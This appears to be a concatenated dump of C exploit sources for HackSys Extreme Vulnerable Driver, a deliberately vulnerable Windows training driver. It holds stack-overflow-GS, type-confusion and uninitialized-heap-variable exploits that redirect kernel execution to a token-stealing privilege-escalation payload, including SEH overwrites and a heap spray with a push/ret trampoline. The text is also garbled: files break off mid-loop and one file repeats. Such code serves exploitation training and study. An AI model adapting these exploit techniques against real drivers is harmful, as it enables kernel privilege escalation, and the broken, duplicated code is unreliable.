        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        // Assumes the project helper reports failure as INVALID_HANDLE_VALUE.
        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Creating Shared Memory\n");

        // Create the shared memory
        // Pagefile-backed (INVALID_HANDLE_VALUE), one page, RWX protection.
        // PAGE_EXECUTE_READWRITE is more than this code needs: the mapping is
        // only written and read, never executed from.
        Sharedmemory = CreateFileMapping(INVALID_HANDLE_VALUE,
                                         NULL,
                                         PAGE_EXECUTE_READWRITE,
                                         0,
                                         PageSize,
                                         SharedMemoryName);

        if (!Sharedmemory) {
            DEBUG_ERROR("\t\t\t[-] Failed To Create Shared Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Shared Memory Handle: 0x%p\n", Sharedmemory);
        }

        DEBUG_INFO("\t\t[+] Mapping Shared Memory To Current Process Space\n");

        // Map the shared memory in the process space of this process
        SharedMappedMemoryAddress = MapViewOfFile(Sharedmemory,
                                                  FILE_MAP_ALL_ACCESS,
                                                  0,
                                                  0,
                                                  PageSize);

        if (!SharedMappedMemoryAddress) {
            DEBUG_ERROR("\t\t\t[-] Failed To Map Shared Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Mapped Shared Memory: 0x%p\n", SharedMappedMemoryAddress);
        }

        // Buffer start = page end - 0x214, so the buffer's last byte is the
        // last byte of the mapping.  (ULONG) pointer arithmetic is 32-bit only.
        SuitableMemoryForBuffer = (PVOID)((ULONG)SharedMappedMemoryAddress + (ULONG)(PageSize - SeHandlerOverwriteOffset));

        DEBUG_INFO("\t\t[+] Suitable Memory For Buffer: 0x%p\n", SuitableMemoryForBuffer);

        DEBUG_INFO("\t\t[+] Preparing Buffer Memory Layout\n");

        // Filler pattern over the whole page.
        RtlFillMemory(SharedMappedMemoryAddress, PageSize, 0x41);

        // Four consecutive ULONGs starting at buffer offset 0x204; the last
        // one (offset 0x210) is the final ULONG before the page boundary.
        MemoryAddress = (PVOID)((ULONG)SuitableMemoryForBuffer + 0x204);
        *(PULONG)MemoryAddress = 0x42424242; // overwrite xor'ed cookie

        DEBUG_INFO("\t\t\t[+] XOR'ed GS Cookie Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] XOR'ed GS Cookie Address: 0x%p\n", MemoryAddress);

        MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
        *(PULONG)MemoryAddress = 0x43434343; // junk

        MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
        *(PULONG)MemoryAddress = 0x44444444; // Next SE handler

        DEBUG_INFO("\t\t\t[+] Next SE Handler Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] Next SE Handler Address: 0x%p\n", MemoryAddress);

        MemoryAddress = (PVOID)((ULONG)MemoryAddress + 0x4);
        *(PULONG)MemoryAddress = (ULONG)EopPayload; // SE Handler

        DEBUG_INFO("\t\t\t[+] SE Handler Value: 0x%p\n", *(PULONG)MemoryAddress);
        DEBUG_INFO("\t\t\t[+] SE Handler Address: 0x%p\n", MemoryAddress);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Kernel Stack Overflow GS\n");

        OutputDebugString("****************Kernel Mode****************\n");

        // The cast binds to SeHandlerOverwriteOffset only; the addition is
        // done afterwards, giving 0x214 + 0x4.  Driver-side, validating the
        // input length against the stack buffer before copying (and not
        // catching the resulting fault with a handler on the same frame) is
        // the mitigation this case is meant to illustrate.
        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS,
                        (LPVOID)SuitableMemoryForBuffer,
                        (DWORD)SeHandlerOverwriteOffset + RAISE_EXCEPTION_IN_KERNEL_MODE,
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() is not the exception code; GetExceptionCode() would
        // be the accurate value to log here.
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
180 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/StackOverflowGS.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see .
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | StackOverflowGS.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Stack Overflow Vulnerability protected by
47 | GS cookies implemented in HackSys Extreme Vulnerable
48 | Driver.
49 |
50 | --*/
51 |
52 | #ifndef __STACK_OVERFLOW_GS_H__
53 | #define __STACK_OVERFLOW_GS_H__
54 |
55 | #pragma once
56 |
57 | #include "Common.h"
58 |
// Added to the DeviceIoControl input length in StackOverflowGS.c.  The input
// buffer there is placed so that it ends exactly at a page boundary, so these
// extra bytes lie beyond the mapping.
#define RAISE_EXCEPTION_IN_KERNEL_MODE 0x4
// Name of the file mapping created by StackOverflowGSThread.  A fixed name
// with default security means other processes in the same session can
// presumably open it; fine for a lab tool, not for anything shipped.
#define SHARED_MEMORY_NAME "HackSysExtremeVulnerableDriverSharedMemory"

// Thread entry point (CreateThread signature); Parameter is unused.
DWORD WINAPI StackOverflowGSThread(LPVOID Parameter);
63 |
64 | #endif //__STACK_OVERFLOW_GS_H__
65 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/TypeConfusion.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see <http://www.gnu.org/licenses/>.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | TypeConfusion.c
43 |
44 | Abstract:
45 | This module implements the exploit for Type Confusion
46 | Vulnerability implemented in HackSys Extreme Vulnerable
47 | Driver.
48 |
49 | --*/
50 |
51 | #include "TypeConfusion.h"
52 |
/*
 * Worker thread for the "Type Confusion" lab case.
 *
 * Allocates one USER_TYPE_CONFUSION_OBJECT (layout declared in
 * TypeConfusion.h, not visible here), sets objectID to 1 and objectType to
 * the address of TokenStealingPayloadWin7Generic, and passes the struct to
 * the driver with HACKSYS_EVD_IOCTL_TYPE_CONFUSION.  The body runs under SEH;
 * any exception terminates the process via exit().
 *
 * Parameter: unused (present only to satisfy the CreateThread signature).
 * Returns:   EXIT_SUCCESS.  Every failure path calls exit(EXIT_FAILURE)
 *            instead of returning.
 *
 * NOTE(review): hFile is never closed and the heap chunk is not freed on the
 * exception path; tolerable only because the process exits on every error.
 * NOTE(review): DeviceIoControl's return value is ignored, so a driver that
 * rejects the request is logged exactly like one that accepted it.
 */
DWORD WINAPI TypeConfusionThread(LPVOID Parameter) {
    HANDLE hFile = NULL;
    ULONG BytesReturned;
    LPCSTR FileName = (LPCSTR)DEVICE_NAME;
    // User-mode function address (defined elsewhere in the project).
    PVOID EopPayload = &TokenStealingPayloadWin7Generic;
    PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject = NULL;

    __try {
        DEBUG_MESSAGE("\t[+] Setting Thread Priority\n");

        // Best-effort; failure is logged but not fatal.
        if (!SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST)) {
            DEBUG_ERROR("\t\t[-] Failed To Set As THREAD_PRIORITY_HIGHEST\n");
        }
        else {
            DEBUG_INFO("\t\t[+] Priority Set To THREAD_PRIORITY_HIGHEST\n");
        }

        // Get the device handle
        DEBUG_MESSAGE("\t[+] Getting Device Driver Handle\n");
        DEBUG_INFO("\t\t[+] Device Name: %s\n", FileName);

        hFile = GetDeviceHandle(FileName);

        // Assumes the project helper reports failure as INVALID_HANDLE_VALUE.
        if (hFile == INVALID_HANDLE_VALUE) {
            DEBUG_ERROR("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t[+] Device Handle: 0x%X\n", hFile);
        }

        DEBUG_MESSAGE("\t[+] Setting Up Vulnerability Stage\n");

        DEBUG_INFO("\t\t[+] Allocating Memory For USER_TYPE_CONFUSION_OBJECT\n");

        // Allocate the Heap chunk
        UserTypeConfusionObject = (PUSER_TYPE_CONFUSION_OBJECT)HeapAlloc(GetProcessHeap(),
                                                                         HEAP_ZERO_MEMORY,
                                                                         sizeof(USER_TYPE_CONFUSION_OBJECT));

        if (!UserTypeConfusionObject) {
            DEBUG_ERROR("\t\t\t[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
            exit(EXIT_FAILURE);
        }
        else {
            DEBUG_INFO("\t\t\t[+] Memory Allocated: 0x%p\n", UserTypeConfusionObject);
            DEBUG_INFO("\t\t\t[+] Allocation Size: 0x%X\n", sizeof(USER_TYPE_CONFUSION_OBJECT));
        }

        DEBUG_INFO("\t\t[+] Preparing USER_TYPE_CONFUSION_OBJECT structure\n");

        // objectType is a ULONG here, so the pointer is truncated to 32 bits;
        // consistent with the project's /MACHINE:X86 build only.  The
        // driver-side lesson is that a type tag supplied by the caller must
        // never be reinterpreted as a pointer without validation.
        UserTypeConfusionObject->objectID = (ULONG)0x01;
        UserTypeConfusionObject->objectType = (ULONG)EopPayload;

        DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject: 0x%p\n", UserTypeConfusionObject);
        DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject->objectID: 0x%p\n", UserTypeConfusionObject->objectID);
        DEBUG_INFO("\t\t\t[+] UserTypeConfusionObject->objectType: 0x%p\n", UserTypeConfusionObject->objectType);

        DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);

        DEBUG_MESSAGE("\t[+] Triggering Kernel Type Confusion\n");

        OutputDebugString("****************Kernel Mode****************\n");

        DeviceIoControl(hFile,
                        HACKSYS_EVD_IOCTL_TYPE_CONFUSION,
                        (LPVOID)UserTypeConfusionObject,
                        sizeof(USER_TYPE_CONFUSION_OBJECT),
                        NULL,
                        0,
                        &BytesReturned,
                        NULL);

        OutputDebugString("****************Kernel Mode****************\n");

        HeapFree(GetProcessHeap(), 0, (LPVOID)UserTypeConfusionObject);

        UserTypeConfusionObject = NULL;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        // GetLastError() is not the exception code; GetExceptionCode() would
        // be the accurate value to log here.
        DEBUG_ERROR("\t\t[-] Exception: 0x%X\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
139 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/TypeConfusion.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see http://www.gnu.org/licenses/.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | TypeConfusion.h
43 |
44 | Abstract:
45 | This module implements the data structures used by the
46 | exploit for Type Confusion Vulnerability implemented in
47 | HackSys Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #ifndef __TYPE_CONFUSION_H__
52 | #define __TYPE_CONFUSION_H__
53 |
54 | #pragma once
55 |
56 | #include "Common.h"
57 |
// User-mode image of the object handed to HACKSYS_EVD_IOCTL_TYPE_CONFUSION.
// TypeConfusionThread sets objectID to 1 and overwrites objectType with the
// EoP payload address cast to ULONG; presumably the driver reads that field
// back as a function pointer on the other side of the confused type —
// confirm against the driver source.
typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG objectID;   // set to 1 by the exploit
    ULONG objectType; // carries (ULONG)EopPayload; 32-bit pointers only
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
62 |
// Thread entry point (CreateThread signature) that runs the Type Confusion
// exploit; Parameter is not used by the implementation in TypeConfusion.c.
DWORD WINAPI TypeConfusionThread(LPVOID Parameter);
64 |
65 | #endif //__TYPE_CONFUSION_H__
66 |
--------------------------------------------------------------------------------
/HEVD_Source_with_Unin_Heap_Variable_Chall/UninitializedHeapVariable.c:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]payatu[dot]com
15 | Website: http://www.payatu.com/
16 |
17 | Copyright (C) 2011-2016 Payatu Technologies Pvt. Ltd. All rights reserved.
18 |
19 | This program is free software: you can redistribute it and/or modify it under the terms of
20 | the GNU General Public License as published by the Free Software Foundation, either version
21 | 3 of the License, or (at your option) any later version.
22 |
23 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
24 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
25 | See the GNU General Public License for more details.
26 |
27 | You should have received a copy of the GNU General Public License along with this program.
28 | If not, see http://www.gnu.org/licenses/.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.c
43 |
44 | Abstract:
45 | This module implements the exploit for Uninitialized
46 | Heap Variable Vulnerability implemented in HackSys
47 | Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "UninitializedHeapVariable.h"
#define PAGE_ALLOC 0x400      // element count of the hMutex[] handle array below; a count, not a page size
#define MUTEX_NAME_LEN 120    // byte size of the aMutexName buffer below
54 |
55 |
56 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter) {
57 | /*CONST PTCHAR Message =
58 | "\t \t\n"
59 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
60 | "\t | C | H | A | L | L | E | N | G | E | \t\n"
61 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
62 | "\t \t\n"
63 | "\t Write the exploit for use of Uninitialized Heap Variable \t\n"
64 | "\t \t\n"
65 | "\t Need Help? \t\n"
66 | "\t \t\n"
67 | "\t ashfaq[at]payatu[dot]com \t\n"
68 | "\t \t\n";
69 |
70 | DEBUG_ERROR(Message);
71 |
72 | return EXIT_FAILURE;*/
73 | int i,j,m;
74 | ULONG BytesReturned;
75 | HMODULE hNtDll = NULL;
76 | PVOID VM_Address = NULL;
77 | ULONG Address = 0;
78 | ULONG CallResult = 0;
79 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
80 | SIZE_T RegionSize = 0x1000;
81 | HANDLE hFile = NULL;
82 |
83 | char aMutexName[MUTEX_NAME_LEN];
84 | HANDLE hMutex[PAGE_ALLOC];
85 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
86 | ULONG MagicValue = 0xBAADF00D;
87 |
88 | __try{
89 | DEBUG_INFO("\t[+] Resolving Kernel APIs\n");//Get Kernel API just like NtAllocVirtualMemory and CreateMutex
90 |
91 | hNtDll = LoadLibrary("ntdll.dll");//Load ntdll.dll
92 |
93 | if(!hNtDll)//if load failure
94 | {
95 | DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
96 | exit(EXIT_FAILURE);
97 | }
98 |
99 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtDll, "NtAllocateVirtualMemory");//get NtAllocateVirtualMemory
100 |
101 | if (!NtAllocateVirtualMemory) {
102 | DEBUG_ERROR("\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
103 | exit(EXIT_FAILURE);
104 | }
105 | else {
106 | DEBUG_INFO("\t\t[+] NtAllocateVirtualMemory: 0x%p\n", NtAllocateVirtualMemory);
107 | }
108 |
109 | DEBUG_INFO("\t[+] Alloc Memory\n");
110 |
111 | Address = 0x00460046;
112 | VM_Address = (PVOID)Address;
113 | CallResult = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
114 | &VM_Address,
115 | 0,
116 | &RegionSize,
117 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
118 | PAGE_EXECUTE_READWRITE);
119 |
120 | if (CallResult==0){
121 | DEBUG_INFO("\t\t[+] Allocated memory at VM_Address 0x%p\n", VM_Address);
122 | }
123 | else
124 | {
125 | DEBUG_ERROR("\t\t[-] Create Mutex failed: error 0x%X\n", GetLastError());
126 | exit(EXIT_FAILURE);
127 | }
128 | DEBUG_INFO("\t[+] Kernel Heap Spray\n");
129 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
130 | *(PBYTE)Address = 0x68;
131 | *(PULONG)(Address+1) = (ULONG)EopPayload;
132 | *(PBYTE)(Address+5) = 0xc3;
133 |
134 | for (j=0; j.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
35 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
36 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
37 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
38 |
39 | See the file 'LICENSE' for complete copying permission.
40 |
41 | Module Name:
42 | UninitializedHeapVariable.c
43 |
44 | Abstract:
45 | This module implements the exploit for Uninitialized
46 | Heap Variable Vulnerability implemented in HackSys
47 | Extreme Vulnerable Driver.
48 |
49 | --*/
50 |
51 | #include "UninitializedHeapVariable.h"
#define PAGE_ALLOC 0x400      // element count of the hMutex[] handle array below; a count, not a page size
#define MUTEX_NAME_LEN 120    // byte size of the aMutexName buffer below
54 |
55 |
56 | DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter) {
57 | /*CONST PTCHAR Message =
58 | "\t \t\n"
59 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
60 | "\t | C | H | A | L | L | E | N | G | E | \t\n"
61 | "\t + - + - + - + - + - + - + - + - + - + \t\n"
62 | "\t \t\n"
63 | "\t Write the exploit for use of Uninitialized Heap Variable \t\n"
64 | "\t \t\n"
65 | "\t Need Help? \t\n"
66 | "\t \t\n"
67 | "\t ashfaq[at]payatu[dot]com \t\n"
68 | "\t \t\n";
69 |
70 | DEBUG_ERROR(Message);
71 |
72 | return EXIT_FAILURE;*/
73 | int i,j,m;
74 | ULONG BytesReturned;
75 | HMODULE hNtDll = NULL;
76 | PVOID VM_Address = NULL;
77 | ULONG Address = 0;
78 | ULONG CallResult = 0;
79 | PVOID EopPayload = &TokenStealingPayloadWin7Generic;
80 | SIZE_T RegionSize = 0x1000;
81 | HANDLE hFile = NULL;
82 |
83 | char aMutexName[MUTEX_NAME_LEN];
84 | HANDLE hMutex[PAGE_ALLOC];
85 | LPCSTR FileName = (LPCSTR)DEVICE_NAME;
86 | ULONG MagicValue = 0xBAADF00D;
87 |
88 | __try{
89 | DEBUG_INFO("\t[+] Resolving Kernel APIs\n");//Get Kernel API just like NtAllocVirtualMemory and CreateMutex
90 |
91 | hNtDll = LoadLibrary("ntdll.dll");//Load ntdll.dll
92 |
93 | if(!hNtDll)//if load failure
94 | {
95 | DEBUG_ERROR("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
96 | exit(EXIT_FAILURE);
97 | }
98 |
99 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtDll, "NtAllocateVirtualMemory");//get NtAllocateVirtualMemory
100 |
101 | if (!NtAllocateVirtualMemory) {
102 | DEBUG_ERROR("\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
103 | exit(EXIT_FAILURE);
104 | }
105 | else {
106 | DEBUG_INFO("\t\t[+] NtAllocateVirtualMemory: 0x%p\n", NtAllocateVirtualMemory);
107 | }
108 |
109 | DEBUG_INFO("\t[+] Alloc Memory\n");
110 |
111 | //Address = ('a'+rand()%26<<16)+'a'+rand()%26;
112 | Address = 0x00460046;
113 | VM_Address = (PVOID)Address;
114 | CallResult = NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
115 | &VM_Address,
116 | 0,
117 | &RegionSize,
118 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
119 | PAGE_EXECUTE_READWRITE);
120 |
121 | if (CallResult==0){
122 | DEBUG_INFO("\t\t[+] Allocated memory at VM_Address 0x%p\n", VM_Address);
123 | }
124 | else
125 | {
126 | DEBUG_ERROR("\t\t[-] Create Mutex failed: error 0x%X\n", GetLastError());
127 | exit(EXIT_FAILURE);
128 | }
129 | DEBUG_INFO("\t[+] Kernel Heap Spray\n");
130 | DEBUG_INFO("\t\t[+] EoP Payload: 0x%p\n", EopPayload);
131 |
132 |
133 | *(PBYTE)Address = 0x68;
134 | *(PULONG)(Address+1) = (ULONG)EopPayload;
135 | *(PBYTE)(Address+5) = 0xc3;
136 |
137 | for (j=0; j.
29 |
30 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
31 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
32 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
33 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
34 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
